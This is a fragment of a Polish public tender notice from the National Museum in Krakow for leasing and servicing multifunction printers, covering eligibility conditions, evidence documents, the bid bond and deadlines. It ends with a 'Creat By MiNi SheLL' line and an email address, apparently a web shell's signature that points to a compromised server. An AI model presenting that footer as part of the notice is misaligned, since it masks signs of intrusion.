podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej.<br/>2.	W celu spełniania warunku, o którym mowa w ust. 1 Wykonawca musi wykazać, że: wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie (w ramach jednej umowy), które swoim zakresem obejmowało najem lub dzierżawę i kompleksową obsługę serwisową co najmniej 20 urządzeń wielofunkcyjnych wraz z systemem druku podążającego, świadczoną przez okres co najmniej 36 miesięcy, o wartości co najmniej 300 000,00 zł netto. <br/><br/>UWAGA<br/>1)	Pod pojęciem kompleksowej obsługi Zamawiający rozumie w szczególności zapewnienie ciągłości funkcjonowania urządzeń drukujących/wielofunkcyjnych, serwis, naprawę urządzeń, dostawę materiałów eksploatacyjnych niezbędnych do ich funkcjonowania. Wymagana wartość dostawy obejmuje koszty z tytułu najmu/dzierżawy urządzeń oraz kompleksowej obsługi urządzeń. Do wymaganych wartości dostawy nie wlicza się ewentualnych kosztów wykupu od wykonawcy urządzeń czy też oprogramowania (jeżeli koszty te stanowiły odrębny składnik wynagrodzenia).<br/>2)	Zamawiający nie dopuszcza możliwości sumowania ilości urządzeń czy też wartości wykonywanych zamówień realizowanych w ramach kilku (wielu) umów, w celu uzyskania ilości urządzeń czy też wartości zamówienia wymaganej dla wykazania spełnienia niniejszego warunku udziału w postępowaniu.<br/>3)	W przypadku zamówienia będącego w trakcie wykonywania, które nie zostało jeszcze ukończone, Zamawiający wymaga, aby do dnia składania ofert wykonawca faktycznie zrealizował już zamówienie na dostawę min. 20 urządzeń, przez okres co najmniej 36 miesięcy o wartości min. 300 000,00 zł netto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych, chyba że Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych:<br/>1)	wykazu dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, wg wzoru stanowiącego załącznik nr 8 do SWZ;<br/>2)	dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Przedmiotowe środki dowodowe, o których mowa w niniejszym rozdziale Wykonawca składa wraz z ofertą.<br/>2.	Przedmiotowe środki dowodowe, które zobligowane jest złożyć Wykonawca obejmują: <br/>1)	Kartę katalogową (karta produktu) oferowanego urządzenia, sporządzoną przez producenta (w języku polskim/z tłumaczeniem na język polski, która zawiera informacje techniczne/parametry oferowanego urządzenia w odniesieniu do następujących parametrów technicznych określonych w Opisie Przedmiotu Zamówienia: <br/>a)	Podajniki (liczba)<br/>b)	Panel sterowania<br/>c)	Czas wydruku pierwszej strony	lub wykonania pierwszej kopii ze stanu gotowości;<br/>d)	Obsługiwane formaty edycji skanowania<br/>e)	Szybkość kopiowania. <br/>f)	Rozdzielczość kopiowania, drukowania, skanowania (dpi)<br/>g)	Szybkość skanowania<br/>h)	Kolory<br/>i)	Pomniejszanie/Powiększanie<br/>j)	Maksymalna liczba kopii<br/>k)	Maksymalny rozmiar kopi<br/>l)	Przyłącza<br/>m)	Protokoły sieciowe<br/>n)	Formaty papieru<br/>o)	Automatyczny podajnik dokumentów<br/>p)	Odpowiednia gramatura papieru<br/>q)	Drukowanie dwustronne<br/>r)	Waga urządzenia<br/>s)	Wymagane kompatybilne systemy operacyjne<br/>t)	Napięcie zasilania<br/>u)	Tryby skanowania<br/>v)	Zgodność z normami / certyfikaty <br/>2)	Informację techniczną (np. w specyfikacji technicznej urządzenia lub karcie katalogowej) sporządzoną przez producenta oferowanego urządzenia odnośnie poboru energii elektrycznej przez zaoferowane urządzenie wielofunkcyjne wyrażonym w trybie pracy urządzenia wielofunkcyjnego, rozumiane jako wydruk strony. UWAGA! Zamawiający zaleca odpowiednie oznaczenie pliku/informacji na dokumencie, gdzie znajduje się określony parametr. <br/>4.	Przedmiotowe środki dowodowe, o których mowa w ust. 2 muszą być złożone w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>5.	Jeżeli wykonawca nie złoży przedmiotowego środka dowodowego, o którym mowa w: <br/>a)	ust. 2 pkt. 1) lub będzie on niekompletny, Zamawiający wezwie do jego złożenia lub uzupełnienia w wyznaczonym terminie.<br/>b)	ust. 2 pkt. 2) lub będzie on niekompletny (w tym brak podpisu Wykonawcy, o którym mowa w ust. 4), zgodnie z art. 107 ust. 3 Pzp Zamawiający nie będzie wzywał do jego złożenia lub uzupełniania. W takim przypadku oferta Wykonawcy nie otrzyma punktów w ramach kryteriów oceny ofert, o których mowa w rozdziale XXII ust. 4 SWZ. UWAGA! Powyższy zapis ma zastosowanie również wówczas, jeżeli Wykonawca w ramach złożenia lub uzupełniania przedmiotowego środka dowodowego, o którym mowa w ust. 2 pkt. 1) przedłoży informacje dotyczącą zakresu, o którym mowa w ust. 2 pkt. 2. W takim wypadku oferta również nie otrzyma dodatkowych punktów w ramach oceny ofert. <br/>6.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>7.	Zgodnie z postanowieniami art. 106 ust. 3 Pzp Zamawiający akceptuje równoważne przedmiotowe środki dowodowe (tj. inne dokumenty producenta oferowanego urządzenia), jeśli potwierdzają, że oferowane dostawy, spełniają określone przez zamawiającego wymagania, cechy lub kryteria <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Kartę katalogową (karta produktu) oferowanego urządzenia, sporządzoną przez producenta (w języku polskim/z tłumaczeniem na język polski, która zawiera informacje techniczne/parametry oferowanego urządzenia w odniesieniu do następujących parametrów technicznych określonych w Opisie Przedmiotu Zamówienia: <br/>a)	Podajniki (liczba)<br/>b)	Panel sterowania<br/>c)	Czas wydruku pierwszej strony	lub wykonania pierwszej kopii ze stanu gotowości;<br/>d)	Obsługiwane formaty edycji skanowania<br/>e)	Szybkość kopiowania. <br/>f)	Rozdzielczość kopiowania, drukowania, skanowania (dpi)<br/>g)	Szybkość skanowania<br/>h)	Kolory<br/>i)	Pomniejszanie/Powiększanie<br/>j)	Maksymalna liczba kopii<br/>k)	Maksymalny rozmiar kopi<br/>l)	Przyłącza<br/>m)	Protokoły sieciowe<br/>n)	Formaty papieru<br/>o)	Automatyczny podajnik dokumentów<br/>p)	Odpowiednia gramatura papieru<br/>q)	Drukowanie dwustronne<br/>r)	Waga urządzenia<br/>s)	Wymagane kompatybilne systemy operacyjne<br/>t)	Napięcie zasilania<br/>u)	Tryby skanowania<br/>v)	Zgodność z normami / certyfikaty <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do Formularza Ofertowego (załącznik Nr 1 SWZ) należy dołączyć (w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym):<br/>1)	Oświadczenie o braku podstaw do wykluczenia i spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do SWZ);<br/>2)	Przedmiotowe środki dowodowe, o których mowa w rozdziale XIII SWZ. <br/>3)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy)<br/>4)	W przypadku podmiotów wspólnie składających ofertę, Wykonawca zobligowany jest załączyć oświadczenie, o którym mowa w rozdziale XII ust. 3 SWZ – wg. wzoru stanowiącego załącznik nr 7 do SWZ).<br/>5)	W przypadku polegania na zasobach innego podmiotu Wykonawca zobligowany jest załączyć oświadczenia, o których mowa w rozdziale XI SWZ tj: <br/>a)	zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów Wykonawcy (wg. wzoru stanowiącego załącznik nr 6 do SWZ) lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>b)	oświadczenie innego podmiotu (wg wzoru stanowiącego załącznik Nr 3 do SWZ) potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby;<br/>UWAGA! Zobowiązanie podmiotu trzeciego i oświadczenie musi być podpisane, przez osobę upoważnioną do reprezentowania podmiotu trzeciego, z uwzględnieniem zapisów rozdziału XII ust. 5 SWZ. <br/>6)	dowód wniesienia wadium(w przypadku wadium złożonego w formie poręczeń lub gwarancji) – dokument zalecany do złożenia, nie jest wymagany bezwzględnie przez Zamawiającego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/>6 000,00 zł.<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r.poz. 299).<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Gospodarstwa Krajowego z siedzibą w Warszawie nr rachunku: 15 1130 1150 0012 1268 8420 0022 z dopiskiem &#34;Wadium-nr postępowania&#34;.<br/>UWAGA: Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w formie elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Pzp, bez potwierdzania tych okoliczności;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Muzeum Narodowe w Krakowie <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia(art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>8)	musi zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji;<br/>6.	W przypadku wniesienia wadium w formie:<br/>1)	pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony do oferty;<br/>2)	poręczeń lub gwarancji-wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>7.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być złożone w formie elektronicznej (opatrzone kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym).<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, którym mowa w art. 125 ust. 1 Pzp (o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu), składa każdy z Wykonawców tworzących Konsorcjum. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	W zakresie spełniania warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o zamówieniu wykażą spełnianie jeśli przynajmniej jeden z podmiotów tworzących konsorcjum wykaże, że spełnia w całości warunek, o którym mowa w rozdziale IX ust. 2 SWZ. <br/>4.	Zgodnie z art. 117 ust. 4 Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w oświadczeniu stanowiącym załącznik nr 7 do SWZ, które elementy zamówienia wykonają poszczególni Wykonawcy. <br/>5.	Oświadczenie, o którym mowa w ust. 4 podlega uzupełnieniu na zasadach określonych w art. 128 ust. 1 Pzp <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści Umowy w zakresie:<br/>1) przedłużenia terminu zakończenia realizacji Umowy;<br/>2) zastąpieniu zaoferowanych Urządzeń wielofunkcyjnych;<br/>3) zmiany wysokości wynagrodzenia należnego Wykonawcy;<br/>4) zmiany trybu, zasad i terminów rozliczeń wynagrodzenia umownego;<br/>5) zmianie lokalizacji lub liczby urządzeń;<br/>6) zmiany o charakterze podmiotowym w zakresie Wykonawcy;<br/>7) zmiany w zakresie korzystania z podwykonawców . <br/>Szczegółowy rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określa § 15 Projektu Umowy, stanowiącego załącznik Nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-04 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę tj. Formularz Ofertowy oraz pozostałe dokumenty i oświadczenia, o których mowa w rozdziale XVIII SWZ należy złożyć pod rygorem nieważności w formie elektronicznej (tj. opatrzonej kwalifikowanym podpisem elektronicznym) lub postaci elektronicznej oparzonej podpisem zaufanym lub podpisem osobistym na Platformie dostępnej pod adresem: https://mnk.ezamawiajacy.pl w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-04 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> •	Cena (C) 50%<br/>•	Efektywność energetyczna urządzeń (Z)	46%<br/>•	Czas reakcji (T) 4% <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca, którego oferta została wybrana w zakresie zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy(dalej &#34;zabezpieczenie&#34;) w wysokości 5% ceny całkowitej brutto (łącznie z prawem opcji) wskazanej w ofercie.<br/>2.	Przed zawarciem umowy Wykonawca ma obowiązek wnieść: <br/>1)	Zabezpieczenie należytego wykonania umowy o którym mowa w poprzednim rozdziale. W przypadku złożenia zabezpieczenia w formie niepieniężnej, Wykonawca zobowiązany jest ustalić treść poręczenia/gwarancji zgodnie z wytycznymi Zamawiającego, poprzez przesłanie projektu dokumentu i uzyskanie akceptacji, z zastrzeżeniem uwzględnianie zapisów, o których mowa w rozdziale XXIV.<br/>2)	Oświadczenie podwykonawcy lub/i dostawcy dotyczące przepisów sankcyjnych związanych z wojną w Ukrainie, w przypadku jeśli zostanie wykazany przez Wykonawcę na etapie składania ofert, a zakres który będzie realizował wynosi więcej niż 10% wartości zamówienia. <br/>3. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, w stosunku do którego zachodzi którakolwiek z okoliczności, o której mowa w: art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U. 2022 poz. 835), zwana dalej „UOBN”.

Creat By MiNi SheLL
Email: jattceo@gmail.com